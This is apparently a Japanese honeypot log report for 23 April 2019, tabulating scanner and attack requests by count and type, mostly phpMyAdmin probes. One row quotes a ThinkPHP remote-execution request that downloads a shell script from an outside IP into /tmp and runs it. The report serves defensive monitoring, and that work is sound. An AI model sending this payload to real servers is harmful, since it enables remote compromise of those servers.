BW-Potのログ分析 (2019/04/23)
本日の総アクセス件数は165件です。送信元IP数は68IPです。
・気になる通信
GET /muieblackcat
phpmyadminに対してのスキャナのようです。
| 件数 | 種別 | リクエスト |
| 67 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 63 | アクセス | GET / |
| 5 | 不正中継の調査 | GET www.baidu[.]com/ |
| 4 | Apache Struts 2に関する調査 | GET /index.action |
| 2 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 2 | phpMyAdminに関する調査 | GET //MyAdmin/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET //myadmin/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET //phpMyAdmin/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET //phpmyadmin/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET //pma/scripts/setup.php |
| 2 | phpMyAdminに関する調査 | GET /muieblackcat |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
| 1 | 不正中継の調査 | GET www.proxylists[.]net/proxyjudge.php |
| 1 | ThinkPHPに関する攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20hxxp://81.6.42[.]123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; |
| 1 | phpMyAdminに関する調査 | GET /MyAdmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /myadmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /phpMyAdmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /phpmyadmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /pma/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 1 | クローリング | HEAD /robots.txt |
| 1 | 不明 | GET /acadmin.php |
| 1 | 環境設定の調査 | GET /.env |
参考リンク
